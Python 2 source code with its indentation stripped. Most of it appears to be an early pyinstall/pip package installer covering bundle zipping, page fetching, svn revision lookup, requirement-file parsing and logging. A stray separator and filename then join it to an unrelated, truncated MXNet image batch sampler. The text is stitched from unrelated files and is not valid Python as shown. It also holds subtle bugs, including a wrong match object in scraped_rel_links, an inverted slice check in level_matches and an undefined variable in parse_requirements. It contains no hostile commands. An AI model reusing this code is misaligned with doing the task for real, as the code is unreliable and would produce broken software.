zip = zipfile.ZipFile(bundle_filename, 'w', zipfile.ZIP_DEFLATED)
svn_dirs = []
for dir, basename in (self.build_dir, 'build'), (self.src_dir, 'src'):
dir = os.path.normcase(os.path.abspath(dir))
for dirpath, dirnames, filenames in os.walk(dir):
svn_url = svn_rev = None
if '.svn' in dirnames:
for svn_dir in svn_dirs:
if dirpath.startswith(svn_dir):
# svn-checkout.txt already in parent directory
break
else:
svn_url, svn_rev = _get_svn_info(os.path.join(dir, dirpath))
svn_dirs.append(dirpath)
dirnames.remove('.svn')
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
name = self._clean_zip_name(dirname, dir)
zip.writestr(basename + '/' + name + '/', '')
for filename in filenames:
filename = os.path.join(dirpath, filename)
name = self._clean_zip_name(filename, dir)
zip.write(filename, basename + '/' + name)
if svn_url:
name = os.path.join(dirpath, 'svn-checkout.txt')
name = self._clean_zip_name(name, dir)
zip.writestr(basename + '/' + name, self._svn_checkout_text(svn_url, svn_rev))
zip.writestr('pyinstall-manifest.txt', self.bundle_requirements())
zip.close()
# Unlike installation, this will always delete the build directories
logger.info('Removing temporary build dir %s and source dir %s'
% (self.build_dir, self.src_dir))
for dir in self.build_dir, self.src_dir:
if os.path.exists(dir):
shutil.rmtree(dir)
def _svn_checkout_text(self, svn_url, svn_rev):
return ('# This was an svn checkout; to make it a checkout again run:\n'
'svn checkout --force -r %s %s .\n' % (svn_rev, svn_url))
BUNDLE_HEADER = '''\
# This is a pyinstall bundle file, that contains many source packages
# that can be installed as a group. You can install this like:
# pyinstall this_file.zip
# The rest of the file contains a list of all the packages included:
'''
def bundle_requirements(self):
parts = [self.BUNDLE_HEADER]
for req in sorted(
[req for req in self.requirements.values()
if not req.comes_from],
key=lambda x: x.name):
parts.append('%s==%s\n' % (req.name, req.installed_version))
parts.append('# These packages were installed to satisfy the above requirements:\n')
for req in sorted(
[req for req in self.requirements.values()
if req.comes_from],
key=lambda x: x.name):
parts.append('%s==%s\n' % (req.name, req.installed_version))
## FIXME: should we do something with self.unnamed_requirements?
return ''.join(parts)
def _clean_zip_name(self, name, prefix):
assert name.startswith(prefix+'/'), (
"name %r doesn't start with prefix %r" % (name, prefix))
name = name[len(prefix)+1:]
name = name.replace(os.path.sep, '/')
return name
class HTMLPage(object):
"""Represents one page, along with its URL"""
## FIXME: these regexes are horrible hacks:
_homepage_re = re.compile(r'<th>\s*home\s*page', re.I)
_download_re = re.compile(r'<th>\s*download\s+url', re.I)
## These aren't so aweful:
_rel_re = re.compile("""<[^>]*\srel\s*=\s*['"]?([^'">]+)[^>]*>""", re.I)
_href_re = re.compile('href=(?:"([^"]*)"|\'([^\']*)\'|([^>\\s\\n]*))', re.I|re.S)
def __init__(self, content, url, headers=None):
self.content = content
self.url = url
self.headers = headers
def __str__(self):
return self.url
@classmethod
def get_page(cls, link, req, cache=None, skip_archives=True):
url = link.url
url = url.split('#', 1)[0]
if cache.too_many_failures(url):
return None
if url.lower().startswith('svn'):
logger.debug('Cannot look at svn URL %s' % link)
return None
if cache is not None:
inst = cache.get_page(url)
if inst is not None:
return inst
try:
if skip_archives:
if cache is not None:
if cache.is_archive(url):
return None
filename = link.filename
for bad_ext in ['.tar', '.tar.gz', '.tar.bz2', '.tgz', '.zip']:
if filename.endswith(bad_ext):
content_type = cls._get_content_type(url)
if content_type.lower().startswith('text/html'):
break
else:
logger.debug('Skipping page %s because of Content-Type: %s' % (link, content_type))
if cache is not None:
cache.set_is_archive(url)
return None
logger.debug('Getting page %s' % url)
resp = urllib2.urlopen(url)
real_url = resp.geturl()
headers = resp.info()
inst = cls(resp.read(), real_url, headers)
except (urllib2.HTTPError, urllib2.URLError, socket.timeout, socket.error), e:
desc = str(e)
if isinstance(e, socket.timeout):
log_meth = logger.warn
level =1
desc = 'timed out'
elif isinstance(e, urllib2.URLError):
log_meth = logger.warn
if hasattr(e, 'reason') and isinstance(e.reason, socket.timeout):
desc = 'timed out'
level = 1
else:
level = 2
elif isinstance(e, urllib2.HTTPError) and e.code == 404:
## FIXME: notify?
log_meth = logger.info
level = 2
else:
log_meth = logger.warn
level = 1
log_meth('Could not fetch URL %s: %s' % (link, desc))
log_meth('Will skip URL %s when looking for download links for %s' % (link.url, req))
if cache is not None:
cache.add_page_failure(url, level)
return None
if cache is not None:
cache.add_page([url, real_url], inst)
return inst
@staticmethod
def _get_content_type(url):
"""Get the Content-Type of the given url, using a HEAD request"""
scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
if scheme == 'http':
ConnClass = httplib.HTTPConnection
elif scheme == 'https':
ConnClass = httplib.HTTPSConnection
else:
## FIXME: some warning or something?
## assertion error?
return ''
if query:
path += '?' + query
conn = ConnClass(netloc)
try:
conn.request('HEAD', path, headers={'Host': netloc})
resp = conn.getresponse()
if resp.status != 200:
## FIXME: doesn't handle redirects
return ''
return resp.getheader('Content-Type') or ''
finally:
conn.close()
@property
def links(self):
"""Yields all links in the page"""
for match in self._href_re.finditer(self.content):
url = match.group(1) or match.group(2) or match.group(3)
yield Link(urlparse.urljoin(self.url, url), self)
def rel_links(self):
for url in self.explicit_rel_links():
yield url
for url in self.scraped_rel_links():
yield url
def explicit_rel_links(self, rels=('homepage', 'download')):
"""Yields all links with the given relations"""
for match in self._rel_re.finditer(self.content):
found_rels = match.group(1).lower().split()
for rel in rels:
if rel in found_rels:
break
else:
continue
match = self._href_re.search(match.group(0))
if not match:
continue
url = match.group(1) or match.group(2) or match.group(3)
yield Link(urlparse.urljoin(self.url, url), self)
def scraped_rel_links(self):
for regex in (self._homepage_re, self._download_re):
match = regex.search(self.content)
if not match:
continue
href_match = self._href_re.search(self.content, pos=match.end())
if not href_match:
continue
url = match.group(1) or match.group(2) or match.group(3)
if not url:
continue
url = urlparse.urljoin(self.url, url)
yield Link(url, self)
class PageCache(object):
"""Cache of HTML pages"""
failure_limit = 3
def __init__(self):
self._failures = {}
self._pages = {}
self._archives = {}
def too_many_failures(self, url):
return self._failures.get(url, 0) >= self.failure_limit
def get_page(self, url):
return self._pages.get(url)
def is_archive(self, url):
return self._archives.get(url, False)
def set_is_archive(self, url, value=True):
self._archives[url] = value
def add_page_failure(self, url, level):
self._failures[url] = self._failures.get(url, 0)+level
def add_page(self, urls, page):
for url in urls:
self._pages[url] = page
class Link(object):
def __init__(self, url, comes_from=None):
self.url = url
self.comes_from = comes_from
def __str__(self):
if self.comes_from:
return '%s (from %s)' % (self.url, self.comes_from)
else:
return self.url
def __repr__(self):
return '<Link %s>' % self
@property
def filename(self):
url = self.url
url = url.split('#', 1)[0]
url = url.split('?', 1)[0]
url = url.rstrip('/')
name = posixpath.basename(url)
assert name, (
'URL %r produced no filename' % url)
return name
@property
def scheme(self):
return urlparse.urlsplit(self.url)[0]
@property
def path(self):
return urlparse.urlsplit(self.url)[2]
def splitext(self):
return splitext(posixpath.basename(self.path.rstrip('/')))
_egg_fragment_re = re.compile(r'#egg=([^&]*)')
@property
def egg_fragment(self):
match = self._egg_fragment_re.search(self.url)
if not match:
return None
return match.group(1)
_md5_re = re.compile(r'md5=([a-f0-9]+)')
@property
def md5_hash(self):
match = self._md5_re.search(self.url)
if match:
return match.group(1)
return None
@property
def show_url(self):
return posixpath.basename(self.url.split('#', 1)[0].split('?', 1)[0])
############################################################
## Writing freeze files
def write_freeze(filename, requirement, find_links, find_tags=False):
if filename == '-':
logger.move_stdout_to_stderr()
dependency_links = []
if filename == '-':
f = sys.stdout
else:
## FIXME: should be possible to overwrite requirement file
logger.notify('Writing frozen requirements to %s' % filename)
f = open(filename, 'w')
for dist in pkg_resources.working_set:
if dist.has_metadata('dependency_links.txt'):
dependency_links.extend(dist.get_metadata_lines('dependency_links.txt'))
for link in find_links:
if '#egg=' in link:
dependency_links.append(link)
for link in find_links:
f.write('-f %s\n' % link)
installations = {}
for dist in pkg_resources.working_set:
if dist.key in ('setuptools', 'pyinstall', 'python'):
## FIXME: also skip virtualenv?
continue
req = FrozenRequirement.from_dist(dist, dependency_links, find_tags=find_tags)
installations[req.name] = req
if requirement:
req_f = open(requirement)
for line in req_f:
if not line or line.strip().startswith('#'):
f.write(line)
continue
elif line.startswith('-e') or line.startswith('--editable'):
if line.startswith('-e'):
line = line[2:].strip()
else:
line = line[len('--editable'):].strip().lstrip('=')
line_req = InstallRequirement.from_editable(line)
elif (line.startswith('-r') or line.startswith('--requirement')
or line.startswith('-Z') or line.startswith('--always-unzip')):
logger.debug('Skipping line %r' % line.strip())
continue
else:
line_req = InstallRequirement.from_line(line)
if not line_req.name:
logger.notify("Skipping line because it's not clear what it would install: %s"
% line.strip())
continue
if line_req.name not in installations:
logger.warn("Requirement file contains %s, but that package is not installed"
% line.strip())
continue
f.write(str(installations[line_req.name]))
del installations[line_req.name]
f.write('## The following requirements were added by pyinstall --freeze:\n')
for installation in sorted(installations.values(), key=lambda x: x.name):
f.write(str(installation))
if filename != '-':
logger.notify('Put requirements in %s' % filename)
f.close()
class FrozenRequirement(object):
def __init__(self, name, req, editable, comments=()):
self.name = name
self.req = req
self.editable = editable
self.comments = comments
_rev_re = re.compile(r'-r(\d+)$')
_date_re = re.compile(r'-(20\d\d\d\d\d\d)$')
@classmethod
def from_dist(cls, dist, dependency_links, find_tags=False):
location = os.path.normcase(os.path.abspath(dist.location))
comments = []
if os.path.exists(os.path.join(location, '.svn')):
editable = True
req = get_src_requirement(dist, location, find_tags)
if req is None:
logger.warn('Could not determine svn location of %s' % location)
comments.append('## !! Could not determine svn location')
req = dist.as_requirement()
editable = False
else:
editable = False
req = dist.as_requirement()
specs = req.specs
assert len(specs) == 1 and specs[0][0] == '=='
version = specs[0][1]
ver_match = cls._rev_re.search(version)
date_match = cls._date_re.search(version)
if ver_match or date_match:
svn_location = get_svn_location(dist, dependency_links)
if not svn_location:
logger.warn(
'Warning: cannot find svn location for %s' % req)
comments.append('## FIXME: could not find svn URL in dependency_links for this package:')
else:
comments.append('# Installing as editable to satisfy requirement %s:' % req)
if ver_match:
rev = ver_match.group(1)
else:
rev = '{%s}' % date_match.group(1)
editable = True
req = 'svn+%s@%s#egg=%s' % (svn_location, rev, cls.egg_name(dist))
return cls(dist.project_name, req, editable, comments)
@staticmethod
def egg_name(dist):
name = dist.egg_name()
match = re.search(r'-py\d\.\d$', name)
if match:
name = name[:match.start()]
return name
def __str__(self):
req = self.req
if self.editable:
req = '-e %s' % req
return '\n'.join(list(self.comments)+[str(req)])+'\n'
def get_svn_location(dist, dependency_links):
egg_fragment_re = re.compile(r'#egg=(.*)$')
for url in dependency_links:
egg_fragment = Link(url).egg_fragment
if not egg_fragment:
continue
if '-' in egg_fragment:
## FIXME: will this work when a package has - in the name?
key = '-'.join(egg_fragment.split('-')[:-1]).lower()
else:
key = egg_fragment
if key == dist.key:
return url.split('#', 1)[0]
return None
def get_src_requirement(dist, location, find_tags):
if not os.path.exists(os.path.join(location, '.svn')):
logger.warn('cannot determine version of editable source in %s (is not svn checkout)' % location)
return dist.as_requirement()
repo = get_svn_url(location)
if repo is None:
return None
parts = repo.split('/')
## FIXME: why not project name?
egg_project_name = dist.egg_name().split('-', 1)[0]
if parts[-2] in ('tags', 'tag'):
# It's a tag, perfect!
return 'svn+%s#egg=%s-%s' % (repo, egg_project_name, parts[-1])
elif parts[-2] in ('branches', 'branch'):
# It's a branch :(
rev = get_svn_revision(location)
return 'svn+%s@%s#egg=%s%s-r%s' % (repo, rev, dist.egg_name(), parts[-1], rev)
elif parts[-1] == 'trunk':
# Trunk :-/
rev = get_svn_revision(location)
if find_tags:
tag_url = '/'.join(parts[:-1]) + '/tags'
tag_revs = get_tag_revs(tag_url)
match = find_tag_match(rev, tag_revs)
if match:
logger.notify('trunk checkout %s seems to be equivalent to tag %s' % match)
return 'svn+%s/%s#egg=%s-%s' % (tag_url, match, egg_project_name, match)
return 'svn+%s@%s#egg=%s-dev' % (repo, rev, dist.egg_name())
else:
# Don't know what it is
logger.warn('svn URL does not fit normal structure (tags/branches/trunk): %s' % repo)
rev = get_svn_revision(location)
return '%s@%s#egg=%s-dev' % (repo, rev, egg_project_name)
_svn_url_re = re.compile('url="([^"]+)"')
_svn_rev_re = re.compile('committed-rev="(\d+)"')
def get_svn_revision(location):
"""
Return the maximum revision for all files under a given location
"""
# Note: taken from setuptools.command.egg_info
revision = 0
for base, dirs, files in os.walk(location):
if '.svn' not in dirs:
dirs[:] = []
continue # no sense walking uncontrolled subdirs
dirs.remove('.svn')
entries_fn = os.path.join(base, '.svn', 'entries')
if not os.path.exists(entries_fn):
## FIXME: should we warn?
continue
f = open(entries_fn)
data = f.read()
f.close()
if data.startswith('8') or data.startswith('9'):
data = map(str.splitlines,data.split('\n\x0c\n'))
del data[0][0] # get rid of the '8'
dirurl = data[0][3]
revs = [int(d[9]) for d in data if len(d)>9 and d[9]]+[0]
if revs:
localrev = max(revs)
else:
localrev = 0
elif data.startswith('<?xml'):
dirurl = _svn_url_re.search(data).group(1) # get repository URL
revs = [int(m.group(1)) for m in _svn_rev_re.finditer(data)]+[0]
if revs:
localrev = max(revs)
else:
localrev = 0
else:
logger.warn("Unrecognized .svn/entries format; skipping %s", base)
dirs[:] = []
continue
if base == location:
base_url = dirurl+'/' # save the root url
elif not dirurl.startswith(base_url):
dirs[:] = []
continue # not part of the same svn tree, skip it
revision = max(revision, localrev)
return revision
def get_svn_url(location):
# In cases where the source is in a subdirectory, not alongside setup.py
# we have to look up in the location until we find a real setup.py
orig_location = location
while not os.path.exists(os.path.join(location, 'setup.py')):
last_location = location
location = os.path.dirname(location)
if location == last_location:
# We've traversed up to the root of the filesystem without finding setup.py
logger.warn("Could not find setup.py for directory %s (tried all parent directories)"
% orig_location)
return None
f = open(os.path.join(location, '.svn', 'entries'))
data = f.read()
f.close()
if data.startswith('8') or data.startswith('9'):
data = map(str.splitlines,data.split('\n\x0c\n'))
del data[0][0] # get rid of the '8'
return data[0][3]
elif data.startswith('<?xml'):
return _svn_url_re.search(data).group(1) # get repository URL
else:
logger.warn("Unrecognized .svn/entries format in %s" % location)
# Or raise exception?
return None
def get_tag_revs(svn_tag_url):
stdout = call_subprocess(
['svn', 'ls', '-v', svn_tag_url], show_stdout=False)
results = []
for line in stdout.splitlines():
parts = line.split()
rev = int(parts[0])
tag = parts[-1].strip('/')
results.append((tag, rev))
return results
def find_tag_match(rev, tag_revs):
best_match_rev = None
best_tag = None
for tag, tag_rev in tag_revs:
if (tag_rev > rev and
(best_match_rev is None or best_match_rev > tag_rev)):
# FIXME: Is best_match > tag_rev really possible?
# or is it a sign something is wacky?
best_match_rev = tag_rev
best_tag = tag
return best_tag
############################################################
## Requirement files
_scheme_re = re.compile(r'^(http|https|file):', re.I)
_drive_re = re.compile(r'/*([a-z])\|', re.I)
def get_file_content(url, comes_from=None):
"""Gets the content of a file; it may be a filename, file: URL, or
http: URL. Returns (location, content)"""
match = _scheme_re.search(url)
if match:
scheme = match.group(1).lower()
if (scheme == 'file' and comes_from
and comes_from.startswith('http')):
raise InstallationError(
'Requirements file %s references URL %s, which is local'
% (comes_from, url))
if scheme == 'file':
path = url.split(':', 1)[1]
path = path.replace('\\', '/')
match = _drive_re.match(path)
if match:
path = match.group(1) + ':' + path.split('|', 1)[1]
path = urllib.unquote(path)
if path.startswith('/'):
path = '/' + path.lstrip('/')
url = path
else:
## FIXME: catch some errors
resp = urllib2.urlopen(url)
return resp.geturl(), resp.read()
f = open(url)
content = f.read()
f.close()
return url, content
def parse_requirements(filename, finder, comes_from=None):
filename, content = get_file_content(filename, comes_from=comes_from)
for line_number, line in enumerate(content.splitlines()):
line_number += 1
line = line.strip()
if not line or line.startswith('#'):
continue
if line.startswith('-r') or line.startswith('--requirement'):
if line.startswith('-r'):
req_url = line[2:].strip()
else:
req_url = line[len('--requirement'):].strip().strip('=')
if _scheme_re.search(filename):
# Relative to a URL
req_url = urlparse.urljoin(filename, url)
elif not _scheme_re.search(req_url):
req_url = os.path.join(os.path.dirname(filename), req_url)
for item in parse_requirements(req_url, finder, comes_from=filename):
yield item
elif line.startswith('-Z') or line.startswith('--always-unzip'):
# No longer used, but previously these were used in
# requirement files, so we'll ignore.
pass
elif line.startswith('-f') or line.startswith('--find-links'):
if line.startswith('-f'):
line = line[2:].strip()
else:
line = line[len('--find-links'):].strip().lstrip('=')
## FIXME: it would be nice to keep track of the source of
## the find_links:
finder.find_links.append(line)
else:
comes_from = '-r %s (line %s)' % (filename, line_number)
if line.startswith('-e') or line.startswith('--editable'):
if line.startswith('-e'):
line = line[2:].strip()
else:
line = line[len('--editable'):].strip()
req = InstallRequirement.from_editable(
line, comes_from)
else:
req = InstallRequirement(line, comes_from)
yield req
############################################################
## Logging
class Logger(object):
"""
Logging object for use in command-line script. Allows ranges of
levels, to avoid some redundancy of displayed information.
"""
VERBOSE_DEBUG = logging.DEBUG-1
DEBUG = logging.DEBUG
INFO = logging.INFO
NOTIFY = (logging.INFO+logging.WARN)/2
WARN = WARNING = logging.WARN
ERROR = logging.ERROR
FATAL = logging.FATAL
LEVELS = [VERBOSE_DEBUG, DEBUG, INFO, NOTIFY, WARN, ERROR, FATAL]
def __init__(self, consumers):
self.consumers = consumers
self.indent = 0
self.in_progress = None
self.in_progress_hanging = False
def debug(self, msg, *args, **kw):
self.log(self.DEBUG, msg, *args, **kw)
def info(self, msg, *args, **kw):
self.log(self.INFO, msg, *args, **kw)
def notify(self, msg, *args, **kw):
self.log(self.NOTIFY, msg, *args, **kw)
def warn(self, msg, *args, **kw):
self.log(self.WARN, msg, *args, **kw)
def error(self, msg, *args, **kw):
self.log(self.WARN, msg, *args, **kw)
def fatal(self, msg, *args, **kw):
self.log(self.FATAL, msg, *args, **kw)
def log(self, level, msg, *args, **kw):
if args:
if kw:
raise TypeError(
"You may give positional or keyword arguments, not both")
args = args or kw
rendered = None
for consumer_level, consumer in self.consumers:
if self.level_matches(level, consumer_level):
if (self.in_progress_hanging
and consumer in (sys.stdout, sys.stderr)):
self.in_progress_hanging = False
sys.stdout.write('\n')
sys.stdout.flush()
if rendered is None:
if args:
rendered = msg % args
else:
rendered = msg
rendered = ' '*self.indent + rendered
if hasattr(consumer, 'write'):
consumer.write(rendered+'\n')
else:
consumer(rendered)
def start_progress(self, msg):
assert not self.in_progress, (
"Tried to start_progress(%r) while in_progress %r"
% (msg, self.in_progress))
if self.level_matches(self.NOTIFY, self._stdout_level()):
sys.stdout.write(' '*self.indent + msg)
sys.stdout.flush()
self.in_progress_hanging = True
else:
self.in_progress_hanging = False
self.in_progress = msg
self.last_message = None
def end_progress(self, msg='done.'):
assert self.in_progress, (
"Tried to end_progress without start_progress")
if self.stdout_level_matches(self.NOTIFY):
if not self.in_progress_hanging:
# Some message has been printed out since start_progress
sys.stdout.write('...' + self.in_progress + msg + '\n')
sys.stdout.flush()
else:
# These erase any messages shown with show_progress (besides .'s)
logger.show_progress('')
logger.show_progress('')
sys.stdout.write(msg + '\n')
sys.stdout.flush()
self.in_progress = None
self.in_progress_hanging = False
def show_progress(self, message=None):
"""If we are in a progress scope, and no log messages have been
shown, write out another '.'"""
if self.in_progress_hanging:
if message is None:
sys.stdout.write('.')
sys.stdout.flush()
else:
if self.last_message:
padding = ' ' * max(0, len(self.last_message)-len(message))
else:
padding = ''
sys.stdout.write('\r%s%s%s%s' % (' '*self.indent, self.in_progress, message, padding))
sys.stdout.flush()
self.last_message = message
def stdout_level_matches(self, level):
"""Returns true if a message at this level will go to stdout"""
return self.level_matches(level, self._stdout_level())
def _stdout_level(self):
"""Returns the level that stdout runs at"""
for level, consumer in self.consumers:
if consumer is sys.stdout:
return level
return self.FATAL
def level_matches(self, level, consumer_level):
"""
>>> l = Logger()
>>> l.level_matches(3, 4)
False
>>> l.level_matches(3, 2)
True
>>> l.level_matches(slice(None, 3), 3)
False
>>> l.level_matches(slice(None, 3), 2)
True
>>> l.level_matches(slice(1, 3), 1)
True
>>> l.level_matches(slice(2, 3), 1)
False
"""
if isinstance(level, slice):
start, stop = level.start, level.stop
if start is not None and start > consumer_level:
return False
if stop is not None or stop <= consumer_level:
return False
return True
else:
return level >= consumer_level
@classmethod
def level_for_integer(cls, level):
levels = cls.LEVELS
if level < 0:
return levels[0]
if level >= len(levels):
return levels[-1]
return levels[level]
def move_stdout_to_stderr(self):
to_remove = []
to_add = []
for consumer_level, consumer in self.consumers:
if consumer == sys.stdout:
to_remove.append((consumer_level, consumer))
to_add.append((consumer_level, sys.stderr))
for item in to_remove:
self.consumers.remove(item)
self.consumers.extend(to_add)
def call_subprocess(cmd, show_stdout=True,
filter_stdout=None, cwd=None,
raise_on_returncode=True,
command_level=Logger.DEBUG, command_desc=None,
extra_environ=None):
if command_desc is None:
cmd_parts = []
for part in cmd:
if ' ' in part or '\n' in part or '"' in part or "'" in part:
part = '"%s"' % part.replace('"', '\\"')
cmd_parts.append(part)
command_desc = ' '.join(cmd_parts)
if show_stdout:
stdout = None
else:
stdout = subprocess.PIPE
logger.log(command_level, "Running command %s" % command_desc)
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
try:
proc = subprocess.Popen(
cmd, stderr=subprocess.STDOUT, stdin=None, stdout=stdout,
cwd=cwd, env=env)
except Exception, e:
logger.fatal(
"Error %s while executing command %s" % (e, command_desc))
raise
all_output = []
if stdout is not None:
stdout = proc.stdout
while 1:
line = stdout.readline()
if not line:
break
line = line.rstrip()
all_output.append(line + '\n')
if filter_stdout:
level = filter_stdout(line)
if isinstance(level, tuple):
level, line = level
logger.log(level, line)
if not logger.stdout_level_matches(level):
logger.show_progress()
else:
logger.info(line)
else:
returned_stdout, returned_stderr = proc.communicate()
all_output = [returned_stdout or '']
proc.wait()
if proc.returncode:
if raise_on_returncode:
if all_output:
logger.notify('Complete output from command %s:' % command_desc)
logger.notify('\n'.join(all_output) + '\n----------------------------------------')
raise InstallationError(
"Command %s failed with error code %s"
% (command_desc, proc.returncode))
else:
logger.warn(
"Command %s had error code %s"
% (command_desc, proc.returncode))
if stdout is not None:
return ''.join(all_output)
_svn_url_re = re.compile(r'URL: (.+)')
_svn_revision_re = re.compile(r'Revision: (.+)')
def _get_svn_info(dir):
"""Returns (url, revision), where both are strings"""
assert not dir.rstrip('/').endswith('.svn'), 'Bad directory: %s' % dir
output = call_subprocess(['svn', 'info', dir], show_stdout=False,
extra_environ={'LANG': 'C'})
match = _svn_url_re.search(output)
if not match:
logger.warn('Cannot determine URL of svn checkout %s' % display_path(dir))
logger.info('Output that cannot be parsed: \n%s' % output)
return 'unknown', 'unknown'
url = match.group(1).strip()
match = _svn_revision_re.search(output)
if not match:
logger.warn('Cannot determine revision of svn checkout %s' % display_path(dir))
logger.info('Output that cannot be parsed: \n%s' % output)
return url, 'unknown'
return url, match.group(1)
############################################################
## Utility functions
def is_svn_page(html):
"""Returns true if the page appears to be the index page of an svn repository"""
return (re.search(r'<title>[^<]*Revision \d+:', html)
and re.search(r'Powered by (?:<a[^>]*?>)?Subversion', html, re.I))
def file_contents(filename):
fp = open(filename, 'rb')
try:
return fp.read()
finally:
fp.close()
def split_leading_dir(path):
path = str(path)
path = path.lstrip('/').lstrip('\\')
if '/' in path and (('\\' in path and path.find('/') < path.find('\\'))
or '\\' not in path):
return path.split('/', 1)
elif '\\' in path:
return path.split('\\', 1)
else:
return path, ''
def has_leading_dir(paths):
"""Returns true if all the paths have the same leading path name
(i.e., everything is in one subdirectory in an archive)"""
common_prefix = None
for path in paths:
prefix, rest = split_leading_dir(path)
if not prefix:
return False
elif common_prefix is None:
common_prefix = prefix
elif prefix != common_prefix:
return False
return True
def format_size(bytes):
if bytes > 1000*1000:
return '%.1fMb' % (bytes/1000.0/1000)
elif bytes > 10*1000:
return '%iKb' % (bytes/1000)
elif bytes > 1000:
return '%.1fKb' % (bytes/1000.0)
else:
return '%ibytes' % bytes
_normalize_re = re.compile(r'[^a-z]', re.I)
def normalize_name(name):
return _normalize_re.sub('-', name.lower())
def display_path(path):
"""Gives the display value for a given path, making it relative to cwd
if possible."""
path = os.path.normcase(os.path.abspath(path))
if path.startswith(os.getcwd() + os.path.sep):
path = '.' + path[len(os.getcwd()):]
return path
def parse_editable(editable_req):
"""Parses svn+http://blahblah@rev#egg=Foobar into a requirement
(Foobar) and a URL"""
match = re.search(r'(?:#|#.*?&)egg=([^&]*)', editable_req)
if not match or not match.group(1):
raise InstallationError(
'--editable=%s is not the right format; it must have #egg=Package'
% editable_req)
req = match.group(1)
## FIXME: use package_to_requirement?
match = re.search(r'^(.*?)(?:-dev|-\d.*)', req)
if match:
# Strip off -dev, -0.2, etc.
req = match.group(1)
url = editable_req
if url.lower().startswith('svn:'):
url = 'svn+' + url
if '+' not in url:
raise InstallationError(
'--editable=%s should be formatted with svn+URL' % editable_req)
vc_type = url.split('+', 1)[0].lower()
if vc_type != 'svn':
raise InstallationError(
'For --editable=%s only svn (svn+URL) is currently supported' % editable_req)
return req, url
def backup_dir(dir, ext='.bak'):
"""Figure out the name of a directory to back up the given dir to
(adding .bak, .bak2, etc)"""
n = 1
extension = ext
while os.path.exists(dir + extension):
n += 1
extension = ext + str(n)
return dir + extension
def ask(message, options):
"""Ask the message interactively, with the given possible responses"""
while 1:
response = raw_input(message)
response = response.strip().lower()
if response not in options:
print 'Your response (%r) was not one of the expected responses: %s' % (
response, ', '.join(options))
else:
return response
def open_logfile_append(filename):
"""Open the named log file in append mode.
If the file already exists, a separator will also be printed to
the file to separate past activity from current activity.
"""
exists = os.path.exists(filename)
log_fp = open(filename, 'a')
if exists:
print >> log_fp, '-'*60
print >> log_fp, '%s run on %s' % (sys.argv[0], time.strftime('%c'))
return log_fp
def is_url(name):
"""Returns true if the name looks like a URL"""
if ':' not in name:
return False
scheme = name.split(':', 1)[0].lower()
return scheme in ('http', 'https', 'file', 'ftp')
def is_filename(name):
if (splitext(name)[1].lower() in ('.zip', '.tar.gz', '.tar.bz2', '.tgz', '.tar', '.pybundle')
and os.path.exists(name)):
return True
if os.path.sep not in name and '/' not in name:
# Doesn't have any path components, probably a requirement like 'Foo'
return False
return True
_drive_re = re.compile('^([a-z]):', re.I)
_url_drive_re = re.compile('^([a-z])[|]', re.I)
def filename_to_url(filename):
"""
Convert a path to a file: URL. The path will be made absolute.
"""
filename = os.path.normcase(os.path.abspath(filename))
url = urllib.quote(filename)
if _drive_re.match(url):
url = url[0] + '|' + url[2:]
url = url.replace(os.path.sep, '/')
url = url.lstrip('/')
return 'file:///' + url
def url_to_filename(url):
"""
Convert a file: URL to a path.
"""
assert url.startswith('file:'), (
"You can only turn file: urls into filenames (not %r)" % url)
filename = url[len('file:'):].lstrip('/')
filename = urllib.unquote(filename)
if _url_drive_re.match(filename):
filename = filename[0] + ':' + filename[2:]
else:
filename = '/' + filename
return filename
def get_requirement_from_url(url):
"""Get a requirement from the URL, if possible. This looks for #egg
in the URL"""
link = Link(url)
egg_info = link.egg_fragment
if not egg_info:
egg_info = splitext(link.filename)[0]
return package_to_requirement(egg_info)
def package_to_requirement(package_name):
"""Translate a name like Foo-1.2 to Foo==1.3"""
match = re.search(r'^(.*?)(-dev|-\d.*)', package_name)
if match:
name = match.group(1)
version = match.group(2)
else:
name = package_name
version = ''
if version:
return '%s==%s' % (name, version)
else:
return name
def splitext(path):
"""Like os.path.splitext, but take off .tar too"""
base, ext = posixpath.splitext(path)
if base.lower().endswith('.tar'):
ext = base[-4:] + ext
base = base[:-4]
return base, ext
class _Inf(object):
"""I am bigger than everything!"""
def __cmp__(self, a):
if self is a:
return 0
return 1
def __repr__(self):
return 'Inf'
Inf = _Inf()
del _Inf
if __name__ == '__main__':
main()
|
magnetBatchSampler.py
|
import cv2
import time
import numpy as np
import mxnet as mx
import mxnet.ndarray as nd
from enum import Enum
from dataProcessor.imageProcessor import ImageProcessor
from dataProcessor.imageSampler import ImageSampler
from dataProcessor.miningTypes import MiningTypes
from multiprocessing import Process, Queue
class MagNetBatchSampler():
def __init__(self, batch_size, image_sampler, net=None, distance=None, mining=[], random_mining_iterations=5, ctx=mx.cpu(), channels=3):
self.batch_size = batch_size
self.image_sampler = image_sampler
self.ctx = ctx
self.net = net
self.distance = distance
self.mining = mining
self.random_mining_iterations = random_mining_iterations
self.channels = channels
self.batches = Queue()
for worker in range(0,8):
fillDeamon = Process(target=self.fillDeamon, args=(self.batches,))
fillDeamon.daemon = True
fillDeamon.start()
def fillDeamon(self, queue):
while True:
while queue.qsize() < 32:
self.fill(queue)
time.sleep(1)
def fill(self, queue):
queue.put(self.prepareBatch())
def take(self):
return self.batches.get()
def getBatch(self, validation=False, file=None):
if self.batches.qsize() > 0:
return self.take()
else:
time.sleep(1)
return self.getBatch(validation=validation, file=file)
def prepareBatch(self, validation=False, train=False):
batch_cluster = []
coord_cluster = []
px_coord_cluster = []
valid_cluster = []
for iteration in range(0, 12):
pred_batches = np.zeros((self.batch_size, self.channels, self.image_sampler.size, self.image_sampler.size))
pred_coords = np.zeros((self.batch_size, 2))
pred_px_coords = np.zeros((self.batch_size, 2))
pred_valid_batches = np.zeros((self.batch_size, self.channels, self.image_sampler.size, self.image_sampler.size))
images, valids = self.image_sampler.get_cluster_by_px(self.batch_size)
prep_imgs = ImageProcessor.prepare_Images(images, ctx=self.ctx, bgr=False)
prep_valid_imgs = ImageProcessor.prepare_Images(valids, size=self.image_sampler.size, ctx=self.ctx, bgr=True, validation=True)
for batch in range(0, len(images)):
pred_batches[batch] = prep_imgs[batch]
pred_valid_batches[batch] = prep_valid_imgs[batch]
batch_cluster.append(pred_batches)
coord_cluster.append(pred_coords)
px_coord_cluster.append(pred_px_coords)
valid_cluster.append(pred_valid_batches)
#print("reset")
self.reset()
return (batch_cluster, coord_cluster, px_coord_cluster, valid_cluster)
def reset(self):
self.image_sampler.reset()
def unitTest(batches=8, img_size=256):
def mean(img):
